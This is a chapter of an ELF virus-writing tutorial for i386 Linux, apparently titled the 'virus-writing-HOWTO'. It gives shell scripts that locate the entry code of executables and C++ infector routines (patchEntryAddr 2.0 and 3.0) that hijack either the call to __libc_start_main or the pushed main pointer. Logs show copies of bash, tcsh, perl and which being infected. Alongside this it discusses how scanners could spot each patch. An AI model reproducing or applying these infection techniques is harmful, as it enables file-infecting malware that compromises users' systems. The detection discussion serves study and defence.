8. The entry point

 

The longest part of the journey is said to be the passing of the gate.

 Marcus Terentius Varro

If we choose to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code starting at entry_point, find the first call (or jmp), and abuse it. A general disassembler requires way too much intelligence for a virus, though. But we are operating in a homogeneous environment, with one compiler and one C run-time library for all, so the startup code should be the same for every executable.

The following script automates the exercise from Enter evil. Using od(1) to retrieve the entry point is faster than readelf(1), especially since the latter returns a lowercase hexadecimal number that requires tr(1) and bc(1) to process.

Command: src/entry_point/gdb.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )
gdb ${file} -q <<EOT | sed -n -e '/:/p' -e '/ret *$/q' -e '/hlt *$/q'
	break *$entry_point
	run
	set disassembly-flavor intel
	disassemble
EOT

Output: out/redhat-linux-i386/entry_point/sh.gdb
(gdb) Starting program: /bin/bash 
(gdb) (gdb) Dump of assembler code for function _start:
0x8059380 <_start>:	xor    ebp,ebp
0x8059382 <_start+2>:	pop    esi
0x8059383 <_start+3>:	mov    ecx,esp
0x8059385 <_start+5>:	and    esp,0xfffffff0
0x8059388 <_start+8>:	push   eax
0x8059389 <_start+9>:	push   esp
0x805938a <_start+10>:	push   edx
0x805938b <_start+11>:	push   0x80ad030
0x8059390 <_start+16>:	push   0x8058a60
0x8059395 <_start+21>:	push   ecx
0x8059396 <_start+22>:	push   esi
0x8059397 <_start+23>:	push   0x8059480
0x805939c <_start+28>:	call   0x8058fc8 <__libc_start_main>
0x80593a1 <_start+33>:	hlt    
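
The od(1) options used in the script can be tried in isolation. The following is a minimal sketch, not part of the original sources: it builds a 28-byte stand-in file (a hypothetical temporary file, not a real executable) whose bytes 24 to 27 hold the entry point of /bin/bash shown above, and reads them back. The helper name read_entry_point is made up for this illustration, and the result assumes a little-endian host, because od(1) interprets the four bytes in host byte order.

```shell
#!/bin/sh
# read_entry_point FILE: print the 32-bit value stored at byte offset 24,
# which is where e_entry sits in a 32-bit ELF header.
# (Hypothetical helper name; the od options are those of gdb.sh.)
read_entry_point() {
  od -j24 -An -td4 -N4 "$1"
}

# Stand-in file: 24 filler bytes, then 80 93 05 08, that is
# 0x08059380 stored least significant byte first.
tmp=$(mktemp)
{ dd if=/dev/zero bs=24 count=1 2>/dev/null
  printf '\200\223\005\010'
} > "${tmp}"

entry_point=$( read_entry_point "${tmp}" )
rm -f "${tmp}"

# Leaving the variable unquoted drops the leading blanks printed by od(1).
printf '%d = 0x%x\n' ${entry_point} ${entry_point}
```

On a little-endian machine this should print 134583168 = 0x8059380. The decimal form is what expr(1) wants, which is why the script can do without tr(1) and bc(1).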

8.1. Disassemble it again, Sam

Of course we have to check whether the code at the entry address really looks like the output above, just in case the target is already infected (by a superior virus). To implement the comparison we only need offsets and sizes, not actual opcodes. But I will feel better with the opcodes straight in front of me. And ndisasm(1) starts counting with zero, which demands less brain activity.

Command: src/entry_point/ndisasm.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )

# 134512640 = 0x8048000
entry_point_ofs=$( expr ${entry_point} - 134512640 )

ndisasm -e ${entry_point_ofs} -o ${entry_point} -U ${file} \
| sed -e '/ret/q' -e '/hlt/q'

Output: out/redhat-linux-i386/entry_point/sh.ndisasm
08059380  31ED              xor ebp,ebp
08059382  5E                pop esi
08059383  89E1              mov ecx,esp
08059385  83E4F0            and esp,byte -0x10
08059388  50                push eax
08059389  54                push esp
0805938A  52                push edx
0805938B  6830D00A08        push dword 0x80ad030
08059390  68608A0508        push dword 0x8058a60
08059395  51                push ecx
08059396  56                push esi
08059397  6880940508        push dword 0x8059480
0805939C  E827FCFFFF        call 0x8058fc8
080593A1  F4                hlt

8.2. patchEntryAddr 2.0

There is one remaining issue. Elf32_Ehdr::e_entry is an absolute address, as is the value popped off the stack by ret. The operand of call and jmp is encoded relative to the location of the following instruction, however. The following is taken from the documentation of nasm. [1]

CALL imm                      ; E8 rw/rd             [8086]

[…] The codes rb, rw and rd indicate that one of the operands to the instruction is an immediate value, and that the difference between this value and the address of the end of the instruction is to be encoded as a byte, word or doubleword respectively. Where the form rw/rd appears, it indicates that either rw or rd should be used according to whether assembly is being performed in BITS 16 or BITS 32 state respectively.
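
The arithmetic behind this encoding can be checked against the listing in the previous section. The sketch below is an illustration only: the function names call_target and call_operand are made up here, and it assumes a shell with 64-bit arithmetic (true for current bash and dash on common platforms). The call at 0x805939c has the bytes E8 27 FC FF FF, so its operand, read least significant byte first, is 0xfffffc27.

```shell
#!/bin/sh
# call_target ADDR REL32: destination of a 5-byte "call rel32" located at
# ADDR. The operand is relative to the end of the instruction, ADDR + 5.
call_target() {
  # Sign-extend the 32-bit operand (assumes 64-bit shell arithmetic).
  rel=$(( (($2 & 0xffffffff) ^ 0x80000000) - 0x80000000 ))
  printf '0x%x\n' $(( $1 + 5 + rel ))
}

# call_operand ADDR TARGET: the rel32 operand that makes a call located
# at ADDR reach the absolute address TARGET.
call_operand() {
  printf '0x%08x\n' $(( ($2 - ($1 + 5)) & 0xffffffff ))
}

call_target  0x805939c 0xfffffc27
call_operand 0x805939c 0x8058fc8
```

This prints 0x8058fc8 and 0xfffffc27, matching the address and the operand bytes that ndisasm(1) shows for the call.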

Source: src/one_step_closer/e2/patch_entry_addr.inc
bool Target::patchEntryAddr()
{
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  unsigned char* self_entry_code = (unsigned char*)self->e_entry;
  unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000);

  if (0 != memcmp(self_entry_code, target_entry_code, 0xc))
    return false;

  /* check for "call" */
  if (self_entry_code[0x1c] != target_entry_code[0x1c])
    return false;

  /* check for "hlt" */
  if (self_entry_code[0x21] != target_entry_code[0x21])
    return false;

  int beyond_the_call = p.ehdr->e_entry + 0x21; 
  int* patch_point = (int*)(target_entry_code + 0x1D);
  original_entry = beyond_the_call + *patch_point;
  *patch_point = newEntryAddr() - beyond_the_call;

  return true;
}

Output: out/redhat-linux-i386/one_step_closer/e2i1/cc
Infecting copy of /bin/tcsh... wrote 26 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 26 bytes, Ok
Infecting copy of /usr/bin/which... wrote 26 bytes, Ok
Infecting copy of /bin/sh... wrote 26 bytes, Ok

Output: out/redhat-linux-i386/one_step_closer/test-e2i1
ELF/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/one_step_closer/e2i1/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux

ELFGNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.

8.3. Second verse, same as the first

Output looks nice, but we had that already. What has increased code size and complexity gained us?

Source: src/entry_point/entry_point.sh
#!/bin/sh
( readelf -l /bin/bash
  readelf -l ${TMP}/one_step_closer/e1i1/sh_infected
  readelf -l ${TMP}/one_step_closer/e2i1/sh_infected
) | grep '^Entry point'

Output: out/redhat-linux-i386/entry_point/entry_point
Entry point 0x8059380
Entry point 0x80c1280
Entry point 0x8059380

OK. One vulnerability of the infection is not visible to readelf(1) anymore. But does that really help? It's still possible to write a heuristic scanner for it. All it takes is to verify the operand of call shown in the disassembly listing.

Output: out/redhat-linux-i386/entry_point/e2.ndisasm
08059380  31ED              xor ebp,ebp
08059382  5E                pop esi
08059383  89E1              mov ecx,esp
08059385  83E4F0            and esp,byte -0x10
08059388  50                push eax
08059389  54                push esp
0805938A  52                push edx
0805938B  6830D00A08        push dword 0x80ad030
08059390  68608A0508        push dword 0x8058a60
08059395  51                push ecx
08059396  56                push esi
08059397  6880940508        push dword 0x8059480
0805939C  E8DF7E0600        call 0x80c1280
080593A1  F4                hlt

The original value is 0x8058fc8, which resolves into a shared library. The new value is local to the executable and easy to spot: 0x80c1280. So what's the point?
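
Such a scanner check could be as simple as the following sketch. It rests on an assumption that is mine, not something the listings prove in general: that with this tool chain the stub used to reach __libc_start_main lies below _start, so a call in the startup code that goes forward is suspicious. The function names are hypothetical, and both addresses are taken from the listings above.

```shell
#!/bin/sh
# call_goes_forward ENTRY TARGET: succeed when the call in the startup
# code at ENTRY leads to an address at or beyond ENTRY.
# Assumption: an untouched executable calls backward, below _start.
call_goes_forward() {
  [ $(( $2 >= $1 )) -eq 1 ]
}

# check ENTRY TARGET: print a one-line verdict for the call target.
check() {
  if call_goes_forward "$1" "$2"; then
    echo "$2: suspicious"
  else
    echo "$2: plausible"
  fi
}

check 0x8059380 0x8058fc8   # original /bin/bash
check 0x8059380 0x80c1280   # infected copy
```

With the values above the first call is reported as plausible and the second as suspicious.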

8.4. Use the Source, Luke

gdb(1) revealed the name of the function whose call we abused: __libc_start_main. I can't help thinking that it is part of glibc, but let's not be hasty.

Command: src/entry_point/ldd.sh
#!/bin/sh
ldd /bin/bash

Output: out/redhat-linux-i386/entry_point/ldd
	libtermcap.so.2 => /lib/libtermcap.so.2 (0x40021000)
	libdl.so.2 => /lib/libdl.so.2 (0x40025000)
	libc.so.6 => /lib/libc.so.6 (0x40029000)
	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

Now that we have a filename we can search for the function in the library.

Command: src/entry_point/nm.sh
#!/bin/sh
library=$( ldd /bin/bash | perl -ane 'm/libc/ && print $F[2];' )
nm -D $library --line-numbers --no-sort | grep __libc_start_main

Output: out/redhat-linux-i386/entry_point/nm
0001c288 T __libc_start_main	/usr/src/build/85131-i386/BUILD/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c:53

First class service. We even got a line number from nm(1).

Command: src/entry_point/get_libc_start_main.sh
#!/bin/sh
output=${1:-src/entry_point/__libc_start_main}

# third character of IFS is a tab-stop, not just a space
IFS=' :	'
read addr type name original_filename line_number \
< ${OUT}/entry_point/nm
filename="/usr/src/redhat/SOURCES/${original_filename#*BUILD/}"

# If the file is not in the place I'm used to on my machine
# we fall back to the copy shipped with this document.
# Forcing my usage of SRPMs gains nothing.
[ -e "${filename}" ] || exit 0

( echo "# ${filename}"
  echo ""
  start=$( expr ${line_number} - 7 )
  nl -ba -p ${filename} | sed -n "${start},${line_number} p"
) > ${output}
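
How the read in this script splits the line from nm(1) can be checked in isolation. The following sketch is an illustration only: it feeds the line shown in the nm output above through the same IFS setting, and the function name split_nm_line is made up for it.

```shell
#!/bin/sh
tab=$(printf '\t')

# The line printed by nm(1) above, with a tab before the file name.
line="0001c288 T __libc_start_main${tab}/usr/src/build/85131-i386/BUILD/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c:53"

# split_nm_line LINE: print symbol name, shortened path and line number.
split_nm_line() {
  printf '%s\n' "$1" | {
    # Space, colon and tab all act as field separators for this read.
    IFS=" :${tab}" read addr type name original_filename line_number
    # Strip everything up to and including "BUILD/" from the path.
    printf '%s\n' "${name}" "${original_filename#*BUILD/}" "${line_number}"
  }
}

split_nm_line "${line}"
```

The three lines printed are __libc_start_main, glibc-2.2.4/csu/../sysdeps/generic/libc-start.c and 53. The colon in IFS is what separates the line number from the file name.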

Output: src/entry_point/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c

    46	int
    47	/* GKM FIXME: GCC: this should get __BP_ prefix by virtue of the
    48	   BPs in the arglist of startup_info.main and startup_info.init. */
    49	BP_SYM (__libc_start_main) (int (*main) (int, char **, char **),
    50			   int argc, char *__unbounded *__unbounded ubp_av,
    51			   void (*init) (void), void (*fini) (void),
    52			   void (*rtld_fini) (void), void *__unbounded stack_end)
    53	{

If you have a procedure with 10 parameters, you probably missed some (according to an old saying).

Let's see what this declaration tells us about the disassembled code. For one thing, arguments are pushed onto the stack in reverse order. This is the traditional C calling convention. It allows easy implementation of functions like printf(3) that take an arbitrary number of arguments. The actual argument values are main = 0x8059480, init = 0x8058a60, fini = 0x80ad030.
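
The mapping between push instructions and parameters can be spelled out mechanically. The sketch below is an illustration, not part of the original sources: it reverses the operands of the eight push instructions from the disassembly and pairs them with the seven parameter names of the declaration. The function name map_arguments is made up, and my reading of the leftover push eax as mere stack padding is an assumption.

```shell
#!/bin/sh
# Operands of the eight push instructions in _start, in program order.
pushes='eax esp edx 0x80ad030 0x8058a60 ecx esi 0x8059480'
# Parameters of __libc_start_main in declaration order.
params='main argc ubp_av init fini rtld_fini stack_end'

# Reverse the push list: the last value pushed is the first argument.
reversed=''
for operand in ${pushes}; do
  reversed="${operand} ${reversed}"
done

# map_arguments: print one "parameter = operand" line per parameter.
map_arguments() {
  set -- ${reversed}
  for name in ${params}; do
    printf '%-10s = %s\n' "${name}" "$1"
    shift
  done
  # Whatever is left was pushed first and matches no parameter.
  printf '%-10s = %s\n' '(unused)' "$*"
}

map_arguments
```

The output pairs main with 0x8059480, argc with esi, ubp_av with ecx, init with 0x8058a60, fini with 0x80ad030, rtld_fini with edx and stack_end with esp, and leaves eax without a parameter.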

The case of rtld_fini needs more documentation. [2] A comment from glibc's /usr/include/asm/elf.h:

/* SVR4/i386 ABI (pages 3-31, 3-32) says that when the program
    starts %edx contains a pointer to a function
    which might be registered using atexit.
    This provides a mean for the dynamic linker to call
    DT_FINI functions for shared libraries that
    have been loaded before the code runs.
    A value of 0 tells we have no such handler.

Anyway, even without looking at the complete source of __libc_start_main I would guess that each of these function pointers is invoked at some time. We concentrate our efforts on main.

8.5. patchEntryAddr 3.0

Source: src/one_step_closer/e3/patch_entry_addr.inc
bool Target::patchEntryAddr()
{
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  unsigned char* self_entry_code = (unsigned char*)self->e_entry;
  unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000);

  if (0 != memcmp(self_entry_code, target_entry_code, 0xc))
    return false;

  /* check for last "push" */
  if (self_entry_code[0x17] != target_entry_code[0x17])
    return false;

  /* check for "call" */
  if (self_entry_code[0x1c] != target_entry_code[0x1c])
    return false;

  /* check for "hlt" */
  if (self_entry_code[0x21] != target_entry_code[0x21])
    return false;

  int* patch_point = (int*)(target_entry_code + 0x18);
  original_entry = *patch_point;
  *patch_point = newEntryAddr();

  return true;
}

Output: out/redhat-linux-i386/one_step_closer/test-e3i1
ELF/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/one_step_closer/e3i1/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux

ELFGNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.

8.6. Two is company, three is an orgy

We see the same nice output again and again. So what's different this time?

Output: out/redhat-linux-i386/entry_point/e3.ndisasm
08059380  31ED              xor ebp,ebp
08059382  5E                pop esi
08059383  89E1              mov ecx,esp
08059385  83E4F0            and esp,byte -0x10
08059388  50                push eax
08059389  54                push esp
0805938A  52                push edx
0805938B  6830D00A08        push dword 0x80ad030
08059390  68608A0508        push dword 0x8058a60
08059395  51                push ecx
08059396  56                push esi
08059397  6880120C08        push dword 0x80c1280
0805939C  E827FCFFFF        call 0x8058fc8
080593A1  F4                hlt

The difference from the original is less obvious. Both values of main are local to the executable. But again the modified value is less than 4096 bytes from the end of the code segment.
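
A scanner could turn that observation into a test along the following lines. This is a sketch under loud assumptions: the function names are made up, and the segment description (start 0x08048000, file size 0x79300) is a hypothetical value chosen for illustration, since the program headers of the infected file are not shown here. A real check would take both numbers from the LOAD entry printed by readelf -l.

```shell
#!/bin/sh
# near_segment_end ADDR SEG_VADDR SEG_FILESZ: succeed when ADDR lies
# less than 4096 bytes below the end of the segment.
near_segment_end() {
  distance=$(( $2 + $3 - $1 ))
  [ $(( distance > 0 && distance < 4096 )) -eq 1 ]
}

# report ADDR: judge a value of main against a HYPOTHETICAL code segment
# that starts at 0x08048000 and is 0x79300 bytes long.
report() {
  if near_segment_end "$1" 0x08048000 0x79300; then
    echo "$1: close to the end of the code segment"
  else
    echo "$1: well inside the code segment"
  fi
}

report 0x8059480   # original value of main
report 0x80c1280   # patched value of main
```

Under these assumed segment bounds the original value is reported as well inside the segment and the patched value as close to its end.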

It seems that we achieved little. But the concept of studying source code to find patch points looks promising.

Notes

[1]

Section A.2 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.2 and A.13 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.13.

[2]

http://linuxassembly.org/startup.html